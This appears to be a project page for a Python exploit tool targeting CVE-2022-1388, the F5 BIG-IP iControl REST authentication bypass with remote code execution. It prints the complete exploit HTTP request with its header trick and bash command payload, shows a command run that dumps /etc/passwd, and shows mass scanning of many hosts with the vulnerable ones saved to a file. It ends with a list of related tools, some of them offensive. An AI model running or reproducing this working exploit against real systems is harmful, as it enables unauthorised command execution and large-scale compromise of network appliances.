CVE-2022-1388

CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE.

POST /mgmt/tm/util/bash HTTP/1.1
Host: 
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close, X-F5-Auth-Token, X-Forwarded-For, Local-Ip-From-Httpd, X-F5-New-Authtok-Reqd, X-Forwarded-Server, X-Forwarded-Host
Content-type: application/json
X-F5-Auth-Token: anything
Authorization: Basic YWRtaW46
Content-Length: 42

{"command": "run", "utilCmdArgs": "-c id"}

Usage

Vulnerability detection against a URL.

$ python CVE-2022-1388.py -u https://192.168.2.110
[+] https://192.168.2.110 is vulnerable!!!

Execute arbitrary commands.

$ python CVE-2022-1388.py -u https://192.168.2.110 -c 'cat /etc/passwd'
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
tmshnobody:x:32765:32765:tmshnobody:/:/sbin/nologin
admin:x:0:500:Admin User:/home/admin:/usr/bin/tmsh
qemu:x:107:107:qemu user:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
oprofile:x:16:16:Special user account to be used by OProfile:/:/sbin/nologin
syscheck:x:199:10::/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
f5_remoteuser:x:499:499:f5 remote user account:/home/f5_remoteuser:/sbin/nologin
......

Read all URLs in the file and perform vulnerability detection.

$ python CVE-2022-1388.py -f urls.txt
[-] https://10.1.6.5 is not vulnerable.
[+] https://10.1.92.34 is vulnerable!!!
[+] https://10.2.124.144 is vulnerable!!!
[+] https://10.1.194.22 is vulnerable!!!
[+] https://10.2.21.132 is vulnerable!!!
[+] https://10.1.236.2 is vulnerable!!!
[+] https://10.3.155.2 is vulnerable!!!
[+] https://10.2.155.4 is vulnerable!!!
[+] https://10.3.151.92 is vulnerable!!!
[+] https://10.4.139.131 is vulnerable!!!
[+] https://10.7.226.141 is vulnerable!!!
[+] https://10.1.129.53 is vulnerable!!!
[+] https://10.9.45.2 is vulnerable!!!
[+] https://10.5.96.105 is vulnerable!!!
[+] https://10.3.156.6 is vulnerable!!!
$ cat success.txt
https://10.1.92.34
https://10.2.124.144
https://10.1.194.22
https://10.2.21.132
https://10.1.236.2
https://10.3.155.2
https://10.2.155.4
https://10.3.151.92
https://10.4.139.131
https://10.7.226.141
https://10.1.129.53
https://10.9.45.2
https://10.5.96.105
https://10.3.156.6

CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE

Related tags

Overview

CVE-2022-1388

Usage

Owner

M4rtin Hsu

This little tool is to calculate a MurmurHash value of a favicon to hunt phishing websites on the Shodan platform.

Port scanning tool that uses Python3. Created by Noble Wilson

Grafana-POC(CVE-2021-43798)

A hack for writing switch statements with type annotations in Python.

PreviewGram is for users that wants get a more private experience with the Telegram's Channel.

IPscan - This Script is Framework To automate IP process large scope For Bug Hunting

Hack computer in the form of RAR files from all types of clients, even Linux

A OSINT tool coded in python

A forensic collection tool written in Python.

CVE 2020-14871 Solaris exploit

OpenPort scanner GUI tool (CNMAP)

Scarecrow is a tool written in Python3 allowing you to protect your Python3 scripts.

PoC for CVE-2021-26855 -Just a checker-

Apache OFBiz rmi反序列化EXP(CVE-2021-26295)

labsecurity is a framework and its use is for ethical hacking and computer security

Python & JavaScript Obfuscator made in Python 3.

Password List Maker

Um keylogger que se disfarça de um app que tira print da tela.

Worm/Trojan/Ransomware/apt/Rootkit/Virus Database

Convert a collection of features to a fixed-dimensional matrix using the hashing trick.